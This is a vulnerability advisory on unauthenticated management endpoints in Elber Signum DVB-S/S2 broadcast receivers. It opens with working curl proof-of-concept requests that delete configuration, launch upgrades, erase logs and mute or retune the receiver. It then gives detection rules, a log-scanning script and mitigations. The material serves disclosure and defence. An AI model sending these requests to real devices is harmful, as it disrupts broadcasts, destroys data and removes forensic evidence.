Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 - Device Config Disclosure
Vendor: Elber S.r.l.
Product web page: https://www.elber.it
Affected version: 1.999 Revision 1243
1.317 Revision 602
1.220 Revision 1250
1.220 Revision 1248_1249
1.220 Revision 597
1.217 Revision 1242
1.214 Revision 1023
1.193 Revision 924
1.175 Revision 873
1.166 Revision 550
Summary: The SIGNUM controller from Elber satellite equipment demodulates
one or two DVB-S/S2 signals up to 32APSK (single/multi-stream), achieving
256 KS/s as minimum symbol rate. The TS demodulated signals can be aligned
and configured in 1+1 seamless switching for redundancy. Redundancy can also
be achieved with external ASI and TSoIP inputs. Signum supports MPEG-1 LI/II
audio codec, providing analog and digital outputs; moreover, it’s possible
to set a data PID to be decoded and passed to the internal RDS encoder,
generating the dual MPX FM output.
Desc: The device suffers from an unauthenticated device configuration and
client-side hidden functionality disclosure.
Tested on: NBFM Controller
embOS/IP
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5815
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5815.php
18.08.2023
--
# Config fan
$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp='
Configuration applied
# Delete config
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2'
File delete successfully
# Launch upgrade
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1'
Upgrade launched Successfully
# Log erase
$ curl 'http://TARGET/json_data/erase_log.js?until=-2'
Logs erased
# Until:
# =0 ALL
# =-2 Yesterday
# =-8 Last week
# =-15 Last two weeks
# =-22 Last three weeks
# =-31 Last month
# Set RX config
$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0'
RX Config Applied Successfully
# Show factory window and FPGA upload (Console)
> cleber_show_factory_wnd()
# Etc.

Elber Signum DVB‑S/S2 IRD (1.999 and prior) — Device Configuration Disclosure
Executive summary
Elber Signum DVB‑S/S2 IRD devices (used in radio broadcast and satellite reception) were found to expose unauthenticated configuration endpoints and client‑side hidden functionality. A remote, unauthenticated HTTP interface allowed attackers to change device configuration, erase logs, launch upgrades, delete files, and manipulate receiver parameters. This disclosure affects multiple firmware revisions including 1.999 (Revision 1243) and several earlier builds.
Why this matters
- Unauthenticated remote configuration means an attacker on the network (or via an exposed management interface) can alter broadcast settings, disrupt services, or persist malicious configuration.
- Hidden client functionality disclosed in web assets increases the attack surface — features intended for internal or developer use can be invoked remotely.
- Operational impact ranges from service interruption (loss of RF/MPX outputs, muted streams) to supply chain concerns if upgrades or files can be pushed without authentication.
Affected products and versions
| Vendor | Product | Affected versions |
|---|---|---|
| Elber S.r.l. | SIGNUM DVB‑S/S2 IRD for Radio Networks | 1.999 Revision 1243; 1.317 Rev 602; 1.220 Revs 1250/1248_1249/597; 1.217 Rev 1242; 1.214 Rev 1023; 1.193 Rev 924; 1.175 Rev 873; 1.166 Rev 550 |
Technical description
The device web server exposes a set of JSON/HTTP endpoints that accept GET requests with configuration parameters. Several of these endpoints do not require authentication and perform privileged operations: applying configuration, deleting config files, erasing logs, launching firmware upgrades, and setting radio/MPX/RDS parameters. In addition, client‑side code (console functions) reveals extra functionality intended for factory or development usage.
Typical classes of sensitive actions exposed:
- File operations (delete files in configuration storage)
- Firmware/upgrade initiation
- Log management (erase logs for a time range)
- Fine‑grained RF/audio parameter configuration (mute, gains, RDS settings, etc.)
Example (sanitized) request patterns
Below are sanitized examples showing the kinds of HTTP requests that invoke privileged actions. Do not run these against systems you do not own or manage. Use them only as a reference when assessing your own devices.
GET http://DEVICE_IP/json_data/conf_cmd?index=&cmd=
GET http://DEVICE_IP/json_data/erase_log.js?until=
GET http://DEVICE_IP/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp=
GET http://DEVICE_IP/json_data/NBFMV2RX.setConfig?
What these patterns demonstrate:
- Operations are performed via simple HTTP GET requests with query parameters.
- The endpoints accept complex parameter sets (e.g., many RX configuration options) and return success messages.
- There is no enforced authentication on the endpoints analyzed, so requests from any host with network access to the device will be accepted.
Observed responses (examples)
- “Configuration applied” — when parameters are accepted
- “File delete successfully” — when delete commands succeed
- “Upgrade launched Successfully” — device accepted firmware update command
- “Logs erased” — log deletion accepted
Impact scenarios and risks
- Service disruption — attackers can mute outputs, change carrier/RDS/MPX parameters, or stop streams.
- Supply chain / firmware risk — unauthenticated upgrade launch could be used to push unauthorized firmware if file upload mechanisms are exploitable.
- Evidence removal — erasing logs can hinder incident response and conceal intrusion activity.
- Data exposure — configuration dumps or internal flags revealed through client code can expose sensitive network or operational data.
Detection and monitoring
Administrators can use network and host‑based controls to detect suspicious requests against the device management endpoints. Suggested detection approaches:
- Network IDS/egress monitoring for HTTP requests with URIs containing known management paths (e.g., "json_data" and operation names like "conf_cmd", "erase_log.js").
- Host logs (web server/access logs) showing unauthenticated requests that result in success messages — correlate source IPs and times.
- Integrity monitoring of configuration files — alert on unexpected changes or deletions.
Example IDS signature (concept)
Below is a conceptual IDS rule pattern to detect requests aimed at the exposed configuration endpoints. Adapt to your environment and test before deployment.
# Conceptual signature: alert on HTTP GETs to known JSON management endpoints
alert http any any -> $HOME_NET any (msg:"Elber Signum - config endpoint access"; flow:established,to_server; content:"/json_data/"; http_uri; pcre:"/\/json_data\/(conf_cmd|erase_log\.js|fan|NBFMV2RX\.setConfig)/U"; sid:1000001; rev:1;)
Explanation: This Suricata/Snort‑style rule matches HTTP requests whose normalized URI contains "/json_data/" followed by one of the management actions. The pcre carries the U modifier so it inspects the URI buffer rather than the raw payload, and the dots in "erase_log.js" and "NBFMV2RX.setConfig" are escaped so they match literally. Tune for false positives and add source IP whitelists for legitimate management stations.
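As an added example (not code from the advisory or from Elber), the following Python script applies the same detection idea to web access logs: it picks out requests to the management endpoints listed above, decodes the conf_cmd and erase_log.js parameters using the mappings from the proof of concept, and flags sources that are not allow-listed management stations. The log line format and the sample lines are constructed assumptions.

```python
# Added example (not from the advisory): flag access-log requests to the Elber
# Signum management endpoints. Assumed log format: '<src_ip> <ISO timestamp> "GET <uri>" <status>'
import re
from urllib.parse import urlsplit, parse_qs

# Endpoints named in the advisory and the documented parameter meanings.
CONF_CMD = {"1": "launch upgrade", "2": "delete config file"}
ERASE_UNTIL = {"0": "all logs", "-2": "yesterday", "-8": "last week",
               "-15": "last two weeks", "-22": "last three weeks",
               "-31": "last month"}
MANAGEMENT_PATHS = ("/json_data/conf_cmd", "/json_data/erase_log.js",
                    "/json_data/fan", "/json_data/NBFMV2RX.setConfig")
LINE_RE = re.compile(r'^(\S+) (\S+) "GET (\S+)" (\d{3})$')

def describe(path, query):
    """Translate a management request into a short human-readable action."""
    q = {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}
    if path.endswith("conf_cmd"):
        cmd = CONF_CMD.get(q.get("cmd"), f"unknown cmd {q.get('cmd')}")
        return f"conf_cmd index={q.get('index')}: {cmd}"
    if path.endswith("erase_log.js"):
        rng = ERASE_UNTIL.get(q.get("until"), f"unknown range {q.get('until')}")
        return f"erase logs: {rng}"
    if path.endswith("setConfig"):
        return "RX config change" + (" (mute=1)" if q.get("mute") == "1" else "")
    return "fan config change"

def find_management_requests(lines, allowed_sources=frozenset()):
    """Return (src, time, action, flag) for every hit on a management path."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not a request line in the assumed format
        src, ts, uri, _status = m.groups()
        parts = urlsplit(uri)
        if not parts.path.startswith(MANAGEMENT_PATHS):
            continue
        flag = "allowed source" if src in allowed_sources else "unexpected source"
        hits.append((src, ts, describe(parts.path, parts.query), flag))
    return hits

# Constructed sample lines (not captured from a real device).
SAMPLE_LOG = [
    '10.0.0.5 2023-08-18T10:01:02Z "GET /index.html" 200',
    '10.0.0.5 2023-08-18T10:02:10Z "GET /json_data/conf_cmd?index=4&cmd=2" 200',
    '198.51.100.7 2023-08-18T10:03:44Z "GET /json_data/erase_log.js?until=-2" 200',
    '198.51.100.7 2023-08-18T10:04:01Z "GET /json_data/NBFMV2RX.setConfig?freq=2480000&mute=1" 200',
]
```

Running find_management_requests(SAMPLE_LOG, {"10.0.0.5"}) reports the config delete from the allow-listed host and the log erase and mute from the unexpected host, while the page fetch is ignored.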
Mitigations and recommended actions
If you operate affected devices, prioritize the following mitigation steps:
- Immediate: Isolate the device from untrusted networks. Restrict management access to a secure management VLAN or VPN and enforce firewall ACLs so only authorized hosts can reach the web interface.
- Configuration: Disable remote management if not required. If the web interface must remain enabled, restrict it to HTTPS, ensure authentication is enabled and strong credentials are used, and limit access by IP.
- Monitoring: Enable and forward device logs to a central SIEM and monitor for the success messages noted above; enable integrity checks for configuration files.
- Compensating controls: Deploy web application firewall (WAF) rules to block or challenge suspicious requests to management paths; use network segmentation to separate broadcast infrastructure from general IT networks.
- Patch: Check with the vendor (Elber) for firmware updates that address unauthenticated control and apply vendor‑supplied patches as soon as they are available.
- Operational: Rotate administrative credentials and audit all recent configuration changes and firmware operations for signs of unauthorized activity.
Responsible testing guidance
Only test devices that you own or for which you have explicit written authorization. When validating a device for this issue:
- Perform tests from an isolated management network or a lab environment.
- Use read‑only queries where possible and avoid live destructive actions (file delete, erase logs, or upgrades) unless permitted and required for remediation validation.
- Record all testing steps and notify stakeholders before and after tests.
Vendor contact and disclosure
This issue was publicly documented in a vulnerability advisory. Administrators should consult vendor resources and support channels for firmware updates and mitigation guidance. Keep a record of the firmware version and revision identifiers when contacting the vendor to expedite remediation.
References and further reading
- Public advisory detailing the findings (reported by security researchers): ZeroScience advisory covering the Elber SIGNUM device vulnerability.
- General hardening guidance for embedded network appliances and broadcast infrastructure — focus on network segmentation, authentication, and monitoring.
Summary and takeaways
The Elber Signum IRD devices examined were vulnerable due to unauthenticated management endpoints and exposed client‑side functions. The risk is operationally significant for broadcast systems where continuity and signal integrity are critical. Administrators should immediately restrict access to affected devices, monitor for suspicious activity, apply vendor patches when available, and implement long‑term controls (authentication, segmentation, and monitoring) to reduce the attack surface.